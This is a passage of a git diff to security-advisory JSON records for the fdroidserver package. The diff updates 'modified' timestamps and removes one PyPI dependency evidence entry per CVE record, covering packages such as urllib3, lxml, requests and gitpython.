@@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-33503", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2021-43818.json b/advisories/BREW-fdroidserver-CVE-2021-43818.json index 865a63f28d9..dcf18a742bf 100644 --- a/advisories/BREW-fdroidserver-CVE-2021-43818.json +++ b/advisories/BREW-fdroidserver-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2021-43818", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-0338.json b/advisories/BREW-fdroidserver-CVE-2022-0338.json index c5443753607..d6590b5fea9 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-0338.json +++ b/advisories/BREW-fdroidserver-CVE-2022-0338.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-0338", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-39ph-wr67-j4xq", "CVE-2022-0338", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "loguru", - "subject_version": "0.7.3", - "key": "pkg:pypi/loguru@0.7.3", - "resource": "loguru" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-21699.json b/advisories/BREW-fdroidserver-CVE-2022-21699.json index f7af0a94bcd..132ce288dd7 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-21699.json +++ b/advisories/BREW-fdroidserver-CVE-2022-21699.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-21699", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pq7m-3gw7-gq5x", "CVE-2022-21699", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-2309.json b/advisories/BREW-fdroidserver-CVE-2022-2309.json index 98b1c42d81c..c3c28cd7c67 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-2309.json +++ b/advisories/BREW-fdroidserver-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-2309", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-24302.json b/advisories/BREW-fdroidserver-CVE-2022-24302.json index b0613ae8e96..9acf7ec079f 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-24302.json +++ b/advisories/BREW-fdroidserver-CVE-2022-24302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-24302", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-f8q4-jwww-x3wv", "CVE-2022-24302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-24439.json b/advisories/BREW-fdroidserver-CVE-2022-24439.json index 3b93c8ce925..18ef8cf5835 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-24439.json +++ b/advisories/BREW-fdroidserver-CVE-2022-24439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-24439", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-hcpj-qp55-gfph", "CVE-2022-24439", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-40023.json b/advisories/BREW-fdroidserver-CVE-2022-40023.json index b9d8bcf76b3..6978ad0e593 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-40023.json +++ b/advisories/BREW-fdroidserver-CVE-2022-40023.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-40023", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v973-fxgf-6xhp", "CVE-2022-40023", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.4.1", - "key": "pkg:pypi/mako@1.4.1", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2022-40896.json b/advisories/BREW-fdroidserver-CVE-2022-40896.json index 0c4039687c4..3e7ddfaf51c 100644 --- a/advisories/BREW-fdroidserver-CVE-2022-40896.json +++ b/advisories/BREW-fdroidserver-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2022-40896", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-24816.json b/advisories/BREW-fdroidserver-CVE-2023-24816.json index 85eab9d7ab9..a1d2221ab36 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-24816.json +++ b/advisories/BREW-fdroidserver-CVE-2023-24816.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-24816", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-29gw-9793-fvw7", "CVE-2023-24816", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ipython", - "subject_version": "9.17.1", - "key": "pkg:pypi/ipython@9.17.1", - "resource": "ipython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-32681.json b/advisories/BREW-fdroidserver-CVE-2023-32681.json index 1faffdbd11c..3825803be3c 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-32681.json +++ b/advisories/BREW-fdroidserver-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-32681", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-40267.json b/advisories/BREW-fdroidserver-CVE-2023-40267.json index 3b391171c14..0546cab096f 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-40267.json +++ b/advisories/BREW-fdroidserver-CVE-2023-40267.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-40267", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pr76-5cm5-w9cj", "CVE-2023-40267", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-40590.json b/advisories/BREW-fdroidserver-CVE-2023-40590.json index 8140c0de43a..85b3068ff42 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-40590.json +++ b/advisories/BREW-fdroidserver-CVE-2023-40590.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-40590", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-wfm5-v35h-vwf4", "CVE-2023-40590", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-41040.json b/advisories/BREW-fdroidserver-CVE-2023-41040.json index 5111e6c8aa0..28edb4ed866 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-41040.json +++ b/advisories/BREW-fdroidserver-CVE-2023-41040.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-41040", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-cwvm-v4w8-q58c", "CVE-2023-41040", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-43804.json b/advisories/BREW-fdroidserver-CVE-2023-43804.json index 7a5f1fbd756..1993925fdec 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-43804.json +++ b/advisories/BREW-fdroidserver-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-43804", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-45803.json b/advisories/BREW-fdroidserver-CVE-2023-45803.json index 48bbd189951..64f5c461b7a 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-45803.json +++ b/advisories/BREW-fdroidserver-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-45803", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2023-48795.json b/advisories/BREW-fdroidserver-CVE-2023-48795.json index be115b4876f..3d7f0c14e07 100644 --- a/advisories/BREW-fdroidserver-CVE-2023-48795.json +++ b/advisories/BREW-fdroidserver-CVE-2023-48795.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2023-48795", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-45x7-px36-x8w8", "CVE-2023-48795", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-22190.json b/advisories/BREW-fdroidserver-CVE-2024-22190.json index 15491fb053a..62dd19146d4 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-22190.json +++ b/advisories/BREW-fdroidserver-CVE-2024-22190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-22190", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:11:34Z", "upstream": [ "GHSA-2mqj-m65w-jghx", "CVE-2024-22190", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-35195.json b/advisories/BREW-fdroidserver-CVE-2024-35195.json index 5897f7fc178..faa0b7002d0 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-35195.json +++ b/advisories/BREW-fdroidserver-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-35195", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-3651.json b/advisories/BREW-fdroidserver-CVE-2024-3651.json index 9b1093d202b..76ebacb7329 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-3651.json +++ b/advisories/BREW-fdroidserver-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-3651", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-37891.json b/advisories/BREW-fdroidserver-CVE-2024-37891.json index f880f5691c1..1c3e6286930 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-37891.json +++ b/advisories/BREW-fdroidserver-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-37891", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2024-47081.json b/advisories/BREW-fdroidserver-CVE-2024-47081.json index 36a9a95b77a..ffc55aa1b92 100644 --- a/advisories/BREW-fdroidserver-CVE-2024-47081.json +++ b/advisories/BREW-fdroidserver-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2024-47081", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-50181.json b/advisories/BREW-fdroidserver-CVE-2025-50181.json index 1dee6321d75..db893b4c89c 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-50181.json +++ b/advisories/BREW-fdroidserver-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-50181", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-50182.json b/advisories/BREW-fdroidserver-CVE-2025-50182.json index 21fccd3205b..69190dd16ae 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-50182.json +++ b/advisories/BREW-fdroidserver-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-50182", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-66418.json b/advisories/BREW-fdroidserver-CVE-2025-66418.json index f37e23f598d..cd72e9a6748 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-66418.json +++ b/advisories/BREW-fdroidserver-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-66418", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-66471.json b/advisories/BREW-fdroidserver-CVE-2025-66471.json index 0e2fc536d1f..76bb5a84d85 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-66471.json +++ b/advisories/BREW-fdroidserver-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-66471", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2025-69277.json b/advisories/BREW-fdroidserver-CVE-2025-69277.json index 767a6ba8b43..d4500ca984c 100644 --- a/advisories/BREW-fdroidserver-CVE-2025-69277.json +++ b/advisories/BREW-fdroidserver-CVE-2025-69277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2025-69277", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-mrfv-m5wm-5w6w", "CVE-2025-69277", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pynacl", - "subject_version": "1.6.2", - "key": "pkg:pypi/pynacl@1.6.2", - "resource": "pynacl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-21441.json b/advisories/BREW-fdroidserver-CVE-2026-21441.json index c6422988100..117ef44ba3c 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-21441.json +++ b/advisories/BREW-fdroidserver-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-21441", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-25645.json b/advisories/BREW-fdroidserver-CVE-2026-25645.json index c38a4eb8a4c..2fd7057e74e 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-25645.json +++ b/advisories/BREW-fdroidserver-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-25645", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-41066.json b/advisories/BREW-fdroidserver-CVE-2026-41066.json index 51a75024d96..aa202fa452c 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-41066.json +++ b/advisories/BREW-fdroidserver-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-41066", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:53:08Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.3", - "key": "pkg:pypi/lxml@6.1.3", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-41205.json b/advisories/BREW-fdroidserver-CVE-2026-41205.json index f9b9e2858a4..9f69d7a2a5d 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-41205.json +++ b/advisories/BREW-fdroidserver-CVE-2026-41205.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-41205", "published": "2026-08-13T16:46:32Z", - "modified": "2026-08-13T16:46:32Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-v92g-xgxw-vvmm", "CVE-2026-41205", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.4.1", - "key": "pkg:pypi/mako@1.4.1", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-42215.json b/advisories/BREW-fdroidserver-CVE-2026-42215.json index 1448e408991..c9ba3e5b78d 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-42215.json +++ b/advisories/BREW-fdroidserver-CVE-2026-42215.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-42215", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-rpm5-65cw-6hj4", "CVE-2026-42215", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-42284.json b/advisories/BREW-fdroidserver-CVE-2026-42284.json index 0908d30b56a..b2b6e8a6740 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-42284.json +++ b/advisories/BREW-fdroidserver-CVE-2026-42284.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-42284", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-x2qx-6953-8485", "CVE-2026-42284", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-fdroidserver-CVE-2026-44243.json b/advisories/BREW-fdroidserver-CVE-2026-44243.json index 398508bdab8..2069a56da0e 100644 --- a/advisories/BREW-fdroidserver-CVE-2026-44243.json +++ b/advisories/BREW-fdroidserver-CVE-2026-44243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-fdroidserver-CVE-2026-44243", "published": "2026-08-13T16:46:32Z", - "modified": "2026-09-05T08:52:31Z", + "modified": "2026-09-10T19:12:43Z", "upstream": [ "GHSA-7545-fcxq-7j24", "CVE-2026-44243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": 